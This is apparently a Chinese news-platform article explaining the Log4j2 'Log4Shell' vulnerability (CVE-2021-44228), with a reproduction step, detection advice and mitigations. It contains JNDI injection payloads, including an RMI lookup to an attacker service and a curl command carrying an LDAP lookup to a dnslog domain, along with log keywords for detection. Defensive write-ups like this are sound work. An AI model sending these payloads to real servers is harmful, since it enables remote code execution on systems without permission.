网易首页 > 网易号 > 正文 申请入驻

log4j2被曝高危漏洞,或将影响70%以上企业

0
分享至

北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2。该漏洞被命名为Log4Shell,编号CVE-2021-44228。

高版本的jdk已修改默认配置,可以在一定程度上限制JNDI漏洞利用方式。在这些版本中
com.sun.jndi.ldap.object.trustURLCodebas设置为false,意味着jndi无法使用ldap加载远程代码。但是,还有其他针对此漏洞的攻击方式可能导致RCE。攻击者仍然可以利用服务器上的现有代码来进行有效攻击。

Log4j2是一款优秀的java日志框架,被大量用于业务开发,可能项目本身没有直接使用,但是引用的依赖包中仍然可能用到。只要用户输入的数据会被日志记录,就可被成功攻击。

影响范围Apache Log4j 2.x <= 2.15.1-rc1。

该漏洞于11月下旬由阿里云安全团队的chen zhaojun最先上报。

官网漏洞介绍

https://logging.apache.org/log4j/2.x/index.html

漏洞复现

使用官网
https://logging.apache.org/log4j/2.x/manual/lookups.html中提到的lookup功能,如果日志记录的内容进行类似以下这种形式调用{jndi:rmi://192.168.1.1:1234/bug},就可以直接在服务器端远程调用攻击者注册的名为"bug"的服务。

攻击检测

1.基于攻击方法,可以用很简单的方法检测服务器是否受到jndi注入攻击。在日志中搜索"jndi:ldap: "、 " jndi:rmi:"等关键字,如果有的话就表明服务器已经受到log4j注入攻击。

2.使用 DNS 记录器(例如dnslog.cn),您可以生成一个域名并在您的测试负载中使用它curl 127.0.0.1:8080 -H 'X-Api-Version: ${
jndi:ldap://xxx.dnslog.cn/a}'

刷新页面将显示 DNS 查询,这些查询标识了触发漏洞的主机。

警告:虽然dnslog.cn已成为测试 log4shell 的流行工具,但我们建议谨慎。在测试敏感基础设施时,发送到该站点的信息可能会被其所有者用来编目并随后加以利用。如果您希望更分散地进行测试,您可以设置自己的权威DNS服务器进行测试。

修复方法

1.升级 Apache Log4j2 所有相关应用到最新的 log4j-2.15.0-rc2 版本,rc1版本已被证实存在绕过风险,下载地址

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

2.配置网络防火墙,禁止系统主动外连网络,包含不限于DNS、TCP/IP、ICMP。

3.升级已知受影响的应用及组件,如
srping-boot-strater-log4j2、ApacheSolr、Apache Flink、Apache Druid、Apache Struts2。

4.紧急加固缓解措施:

①设置配置参数:

log4j2.formatMsgNoLookups=True

②修改JVM参数:

-Dlog4j2.formatMsgNoLookups=true

③修改系统环境变量:


FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true

④禁止 log4j2 所在服务器外连

⑤升级jdk版本至6u211 / 7u201 / 8u191 / 11.0.1以上

部分内容来自于网络,如有侵权联系即删除。

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
3-1!女排爆大冷:亚洲冠军大爆发,进攻虐对手64分,中国迎考验

3-1!女排爆大冷:亚洲冠军大爆发,进攻虐对手64分,中国迎考验

知轩体育
2024-05-28 19:07:45
王伟中、许昆林、王浩、周乃翔、王凯、黄强,最新发声!

王伟中、许昆林、王浩、周乃翔、王凯、黄强,最新发声!

政知新媒体
2024-05-28 20:46:18
你永远可以相信上海的生育率

你永远可以相信上海的生育率

格十三
2024-05-28 09:41:59
中国歼16遇到危险,被F16战斗机红外锁定,为何连一点反应都没有

中国歼16遇到危险,被F16战斗机红外锁定,为何连一点反应都没有

星辰故事屋
2024-05-28 18:53:17
中纪委明确:嫖娼的党员,要一律开除

中纪委明确:嫖娼的党员,要一律开除

法律读品
2024-05-28 19:59:04
一汽奥迪女主播穿瑜伽裤直播被指擦边,为卖车“狠活”频出

一汽奥迪女主播穿瑜伽裤直播被指擦边,为卖车“狠活”频出

金融界
2024-05-27 17:46:06
孙春兰,访问意大利

孙春兰,访问意大利

意讯
2024-05-28 20:35:00
保时捷只卖44万了

保时捷只卖44万了

华尔街见闻官方
2024-05-28 19:05:38
涉嫌违反《维护国家安全条例》,6人被香港警方拘捕

涉嫌违反《维护国家安全条例》,6人被香港警方拘捕

新京报
2024-05-28 17:52:31
5月28日俄乌最新:乌克兰无人机“造访”普京官邸

5月28日俄乌最新:乌克兰无人机“造访”普京官邸

西楼饮月
2024-05-28 15:00:03
暴跌96%!阿里一季度净利不足10亿元,跟腾讯的419亿拉开差距了

暴跌96%!阿里一季度净利不足10亿元,跟腾讯的419亿拉开差距了

知道宏观
2024-05-28 14:30:30
闹大了!全国出动上万检查小组查电动车!网友:世界性笑话啊!

闹大了!全国出动上万检查小组查电动车!网友:世界性笑话啊!

三月柳
2024-05-27 17:06:25
继烟卡后,“养臭水”又在中小学生中流行,成年人看完后难以理解

继烟卡后,“养臭水”又在中小学生中流行,成年人看完后难以理解

熙熙说教
2024-05-28 17:47:48
中国华融国际原总经理白天辉一审被判死刑,4年敛财11.08亿余元

中国华融国际原总经理白天辉一审被判死刑,4年敛财11.08亿余元

天天财经116
2024-05-28 17:47:42
无人驾驶车辆导致堵车,萝卜快跑被投诉到留言板……

无人驾驶车辆导致堵车,萝卜快跑被投诉到留言板……

三言科技
2024-05-27 22:00:41
时至今天,俄罗斯应该是有些后悔了!

时至今天,俄罗斯应该是有些后悔了!

种花岛
2024-05-28 10:26:12
女子电子厂上班晒真实收入:工作28天日均12个小时,工资到手发了6300多块

女子电子厂上班晒真实收入:工作28天日均12个小时,工资到手发了6300多块

六子吃凉粉
2024-05-28 13:50:46
2024美国总统大选:特朗普与拜登的选举人团票对决分析

2024美国总统大选:特朗普与拜登的选举人团票对决分析

浩思者
2024-05-28 17:28:45
俄军占领乌克兰18%的领土,就可以半场开香槟宣布胜利了吗?

俄军占领乌克兰18%的领土,就可以半场开香槟宣布胜利了吗?

历史总在押韵
2024-05-27 00:02:04
前京东副总裁、渐冻人蔡磊被传“装病”,好友晒图辟谣

前京东副总裁、渐冻人蔡磊被传“装病”,好友晒图辟谣

都市快报橙柿互动
2024-05-28 16:51:04
2024-05-29 03:16:49
三正科技
三正科技
正心正念正能量
95文章数 0关注度
往期回顾 全部

科技要闻

4月中国手机需求回升 iPhone出货量增长52%

头条要闻

安徽坍塌居民楼结构脆弱 专家称其"像积木搭在墙上"

头条要闻

安徽坍塌居民楼结构脆弱 专家称其"像积木搭在墙上"

体育要闻

安帅:赛前我总会紧张但哨响后就会冷静;球队仅一种风格不行

娱乐要闻

昆凌晒三胎正面照,2岁妹妹超像周杰伦

财经要闻

东方通收购藏雷 花6亿买来"业绩变脸"

汽车要闻

三联屏/纯电续航318km 岚图FREE 318官图发布

态度原创

游戏
教育
时尚
房产
本地

支持试玩 像素剧情《Until Then》6月25日发售

教育要闻

【中招咨询】一文看懂北京八中教育集团招生政策!

穿过这几双鞋的人基本定型了

房产要闻

有点猛!最新房价:海南每㎡跌了2000多!

本地新闻

食味印象|歙县限定!枇杷味儿的清甜初夏

无障碍浏览 进入关怀版